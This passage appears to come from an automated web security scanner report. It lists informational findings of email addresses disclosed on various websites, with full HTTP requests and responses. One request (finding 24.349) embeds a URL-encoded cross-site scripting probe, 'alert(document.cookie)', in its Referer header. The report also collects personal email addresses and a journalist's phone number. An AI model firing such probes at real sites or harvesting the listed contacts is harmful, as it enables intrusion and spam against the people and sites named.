   oneRequired: 'Vul iets in bij in ieder geval een van deze velde
...[SNIP]...
gyldig dato, som {date}',
   dateInFormatMDY: 'Vennligst skriv inn en gyldig dato, i formatet MM/DD/YYYY (for eksempel "12/31/1999")',
   email: 'Vennligst skriv inn en gyldig epost-adresse. For eksempel "espen@domene.no".',
   url: 'Vennligst skriv inn en gyldig URL, for eksempel http://www.google.no.',
   currencyDollar: 'Vennligst fyll ut et gyldig $ bel....p. For eksempel $100.00 .',
   oneRequired: 'Vennligst fyll ut n
...[SNIP]...
osimy poda.. prawid..ow.. dat.. w formacie: {date}',
   dateInFormatMDY: 'Prosimy poda.. poprawn.. date w formacie DD.MM.RRRR (i.e. "12.01.2009")',
   email: 'Prosimy poda.. prawid..owy adres e-mail, np. "jan@domena.pl".',
   url: 'Prosimy poda.. prawid..owy adres URL, np. http://www.google.pl.',
   currencyDollar: 'Prosimy poda.. prawid..ow.. sum.. w PLN. Dla przyk..adu: 100.00 PLN.',
   oneRequired: 'Prosimy wype..ni..
...[SNIP]...
ateSuchAs: 'Digite uma data v..lida, como {date}',
   dateInFormatMDY: 'Digite uma data v..lida, como DD/MM/YYYY (por exemplo, "31/12/1999")',
   email: 'Digite um endere..o de email v..lido. Por exemplo "nome@dominio.com".',
   url: 'Digite uma URL v..lida. Exemplo: http://www.google.com.',
   currencyDollar: 'Digite um valor em dinheiro v..lido. Exemplo: R$100,00 .',
   oneRequired: 'Digite algo para pelo menos um desses c
...[SNIP]...
s.',
   dateSuchAs: 'Digite uma data v..lida, como {date}',
   dateInFormatMDY: 'Digite uma data v..lida, como DD/MM/YYYY (p.ex. "31/12/1999")',
   email: 'Digite um endere..o de email v..lido. Por exemplo "fred@domain.com".',
   url: 'Digite uma URL v..lida, como http://www.google.com.',
   currencyDollar: 'Digite um valor v..lido $. Por exemplo $ 100,00. ',
   oneRequired: 'Digite algo para pelo menos um desses insumos.',
   
...[SNIP]...
SuchAs: 'Prosim, vnesite pravilen datum kot {date}',
   dateInFormatMDY: 'Prosim, vnesite pravilen datum kot MM.DD.YYYY (primer "12.31.1999")',
   email: 'Prosim, vnesite pravilen email naslov. Na primer "fred@domain.com".',
   url: 'Prosim, vnesite pravilen URL kot http://www.google.com.',
   currencyDollar: 'Prosim, vnesit epravilno vrednost .... Primer 100,00... .',
   oneRequired: 'Prosimo, vnesite nekaj za vsaj eno izm
...[SNIP]...
.tna.',
   dateSuchAs: 'Ange ett giltigt datum som t.ex. {date}',
   dateInFormatMDY: 'Ange ett giltigt datum som t.ex. YYYY-MM-DD (i.e. "1999-12-31")',
   email: 'Ange en giltig e-postadress. Till exempel "erik@domain.com".',
   url: 'Ange en giltig webbadress som http://www.google.com.',
   currencyDollar: 'Ange en giltig belopp. Exempelvis 100,00.',
   oneRequired: 'V..nligen ange minst ett av dessa alternativ.',
   errorPre
...[SNIP]...
........ ........ .. .............. ..../..../........ (.................. "12/31/2009").',
   email: '.............. ................ ............ ...................... .......... (.................. "name@domain.com").',
   url: '.............. ................ ................-.................. (.................. http://www.google.com).',
   currencyDollar: '.............. ........ .. .............. (.............
...[SNIP]...

24.348. http://www.mit.edu/people/jik/software/xrn.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mit.edu
Path:   /people/jik/software/xrn.html

Issue detail

The following email addresses were disclosed in the response:
  • bug-xrn@kamens.brookline.ma.us
  • jik@kamens.brookline.ma.us
  • xrn-users-request@kamens.brookline.ma.us

Request

GET /people/jik/software/xrn.html HTTP/1.1
Host: www.mit.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:01 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j
Last-Modified: Fri, 28 Nov 2008 19:18:35 GMT
ETag: "3d02e6-1ba4-4930440b"
Accept-Ranges: bytes
Content-Length: 7076
Connection: close
Content-Type: text/html

<HTML>

<HEAD>

<TITLE>XRN (X News reader)</TITLE>
<LINK REV="MADE" HREF="mailto:jik@kamens.brookline.ma.us">

</HEAD>

<BODY>

<CENTER>
<H1>XRN -- an X News reader</H1>
</CENTER>

<H2>What is XRN?</H
...[SNIP]...
<A
HREF="mailto:bug-xrn@kamens.brookline.ma.us">bug-xrn@kamens.brookline.ma.us</A>
...[SNIP]...
<A
HREF="mailto:xrn-users-request@kamens.brookline.ma.us">xrn-users-request@kamens.brookline.ma.us</A>
...[SNIP]...

24.349. https://www.mytraderonline.com/javascript/master_s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /javascript/master_s_code.js

Issue detail

The following email addresses were disclosed in the response:
  • id@Ls.tc
  • kevin.rogers@dominionenterprises.com

Request

GET /javascript/master_s_code.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:43 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32370

/**************************
flicker
***************************/
try {
document.execCommand('BackgroundImageCache', false, true);
} catch(e) {}


function tourWndw() {
    var imtTour=wind
...[SNIP]...
***
Includes for s_code condition from nav.templ
*********************************/
/***********************************************/
/*
SiteCatalyst code version: H.17.
Created by Kevin Rogers
kevin.rogers@dominionenterprises.com
01.05.2009
*/
/***********************************************/

var s_account="detraderonline"
var s=s_gi(s_account)
/************************** CONFIG SECTION **************************/
/*
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

24.350. http://www.netlingo.com/acronyms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /acronyms.php

Issue detail

The following email address was disclosed in the response:
  • info@netlingo.com

Request

GET /acronyms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 229925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<A href="mailto:info@netlingo.com?Subject=Acronym/Shorthand suggestion">
...[SNIP]...

24.351. http://www.netlingo.com/add-edit/editor-guidelines.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /add-edit/editor-guidelines.php

Issue detail

The following email address was disclosed in the response:
  • info@netlingo.com

Request

GET /add-edit/editor-guidelines.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:info@netlingo.com?subject=PDF submission">info@netlingo.com</a>
...[SNIP]...

24.352. http://www.netlingo.com/contact/contact-us.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /contact/contact-us.php

Issue detail

The following email address was disclosed in the response:
  • info@netlingo.com

Request

GET /contact/contact-us.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Inquiry from Contact Us page Erin">info@netlingo.com</a>
...[SNIP]...

24.353. http://www.netlingo.com/contact/linktonetlingo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /contact/linktonetlingo.php

Issue detail

The following email address was disclosed in the response:
  • info@netlingo.com

Request

GET /contact/linktonetlingo.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Reciprocal%20link%20idea%20Erin">
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Dictionary%20link%20idea%20Erin">
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Resource%20link%20idea%20Erin">
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Paid%20link%20idea%20Erin">
...[SNIP]...

24.354. http://www.netlingo.com/scripts/jquery.bookmark.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /scripts/jquery.bookmark.js

Issue detail

The following email address was disclosed in the response:
  • kbwood@virginbroadband.com.au

Request

GET /scripts/jquery.bookmark.js HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:02:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Nov 2008 18:37:54 GMT
ETag: "3677c5-315c-5c912480"
Accept-Ranges: bytes
Content-Length: 12636
Connection: close
Content-Type: application/x-javascript

/* http://keith-wood.name/bookmark.html
Sharing bookmarks for jQuery v1.0.2.
Written by Keith Wood (kbwood@virginbroadband.com.au) March 2008.
Dual licensed under the GPL (http://dev.jquery.com/browser/trunk/jquery/GPL-LICENSE.txt) and
MIT (http://dev.jquery.com/browser/trunk/jquery/MIT-LICENSE.txt) licenses.
Pleas
...[SNIP]...

24.355. http://www.netlingo.com/scripts/jquery.dimensions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /scripts/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:
  • brandon.aaron@gmail.com
  • paul.bakaus@googlemail.com

Request

GET /scripts/jquery.dimensions.js HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:02:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Nov 2008 18:37:54 GMT
ETag: "3677c7-8bf-5c912480"
Accept-Ranges: bytes
Content-Length: 2239
Connection: close
Content-Type: application/x-javascript

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

24.356. http://www.netlingo.com/scripts/jquery.mousewheel.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /scripts/jquery.mousewheel.js

Issue detail

The following email address was disclosed in the response:
  • brandon.aaron@gmail.com

Request

GET /scripts/jquery.mousewheel.js HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:02:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Nov 2008 18:37:55 GMT
ETag: "3677ca-6f5-5ca066c0"
Accept-Ranges: bytes
Content-Length: 1781
Connection: close
Content-Type: application/x-javascript

/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
* Thanks to:
...[SNIP]...

24.357. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The following email address was disclosed in the response:
  • jbort@nww.com

Request

GET /community/blog/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:03:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:03:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931833340495; path=/; expires=Thu, 24-Jan-13 05:03:53 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com
Content-Length: 95231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
</a>. If you have an idea for a blog, or a news tip on open source, Microsoft or Cisco, contact her at jbort@nww.com, 970-482-6454 or follow Julie on Twitter @Julie188.</p>
...[SNIP]...

24.358. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The following email address was disclosed in the response:
  • Joab_Jackson@idg.com

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:03:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<a href="mailto:Joab_Jackson@idg.com">Joab_Jackson@idg.com</a>
...[SNIP]...

24.359. http://www.noreastermagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.noreastermagazine.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • noreastermag@gmail.com

Request

GET / HTTP/1.1
Host: www.noreastermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: 7f17775ebaca27b049989f22de967fcd=8770a74d6eac2afa63076869bfca0779; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:08:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5572
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<p>
       Nor&#039;easter Magazine has suspended the publishing of the print magazine and
it&#039;s website as of the end of business July 31, 2010.

If you have any questions, please email us at noreastermag@gmail.com    </p>
...[SNIP]...

24.360. http://www.opensource.org/licenses/bsd-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/bsd-license.php

Issue detail

The following email addresses were disclosed in the response:
  • osi@opensource.org
  • webmaster@opensource.org

Request

GET /licenses/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=orttk62qs56op2so5ctlcpa9u7; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:58 GMT
ETag: "7de37e433f136f70754431d33998090d"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

24.361. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:
  • osi@opensource.org
  • webmaster@opensource.org

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:02:12 GMT
ETag: "c78bed29e3c1e7584db2cae96691f4e3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

24.362. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:
  • osi@opensource.org
  • webmaster@opensource.org

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:42 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=cqn9psagddni8r0cu6qcets3f0; expires=Thu, 17-Feb-2011 03:42:02 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:06 GMT
ETag: "ecf056aef437e96f0aaa9888d3f21414"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

24.363. http://www.openusenet.org/diablo/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.openusenet.org
Path:   /diablo/

Issue detail

The following email address was disclosed in the response:
  • LISTNAME-request@openusenet.org

Request

GET /diablo/ HTTP/1.1
Host: www.openusenet.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Tue, 27 Oct 2009 10:23:15 GMT
ETag: "138007-1108-476e810e86ac0"
Accept-Ranges: bytes
Content-Length: 4360
Connection: close
Content-Type: text/html

<html>
<head><title>Diablo Usenet Software</title></head>
<body bgcolor="#ffffff">
<center>
<h2>Diablo Usenet Software</h2>
<h4>Welcome to the home of Diablo - newsfeeding and newsreading server softw
...[SNIP]...
<b>LISTNAME-request@openusenet.org</b>
...[SNIP]...

24.364. http://www.ossp.org/pkg/tool/lmtp2nntp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ossp.org
Path:   /pkg/tool/lmtp2nntp/

Issue detail

The following email addresses were disclosed in the response:
  • ossp-donation@ossp.org
  • ossp@ossp.org
  • rse@engelschall.com
  • thomas@lotterer.net

Request

GET /pkg/tool/lmtp2nntp/ HTTP/1.1
Host: www.ossp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:46 GMT
Server: Apache/2.2.8 (OpenPKG/CURRENT)
Last-Modified: Mon, 31 Mar 2008 22:42:38 GMT
ETag: "60600e-8281-449c35e657380"
Accept-Ranges: bytes
Content-Length: 33409
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="ICON" href="../../../SHARE/ossp_img/ossp-icon.ico">
<link rel="SHORTCUT ICON" href="../../../SHARE/ossp_img/o
...[SNIP]...
<!--
Copyright (c) 2000-2002 The OSSP Project, http://www.ossp.org/
Author: OSSP (ossp@ossp.org)
Modified: 2008-04-01 00:35:52.
Generated from ``index.wml'' via WML 2.0.9 (18-Oct-2002).
by OSSP (ossp@ossp.org)
on 2008-04-01 00:42:37.

DO NOT EDIT THIS FILE DIRECTLY! INSTEAD EDIT ``index.wml''.
-->
...[SNIP]...
<meta name="Author" content="OSSP, ossp@ossp.org">
...[SNIP]...
<a href="mailto:thomas@lotterer.net">thomas@lotterer.net</a>
...[SNIP]...
<a href="mailto:rse@engelschall.com">rse@engelschall.com</a>
...[SNIP]...
<input type="hidden" name="business" value="ossp-donation@ossp.org">
...[SNIP]...

24.365. https://www.paperg.com/post.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The following email address was disclosed in the response:
  • young@jtmarlin.com

Request

GET /post.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:04:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<span id="msg_email">&nbsp;ex. young@jtmarlin.com </span>
...[SNIP]...

24.366. http://www.playshakespeare.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playshakespeare.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • cadams@playshakespeare.com

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...
<p>If you have any questions/comments, feel free to e-mail me at cadams@playshakespeare.com</p>
...[SNIP]...

24.367. http://www.positioniseverything.net/easyclearing.html

Summary

Severity:   Information
Confidence:   Certain
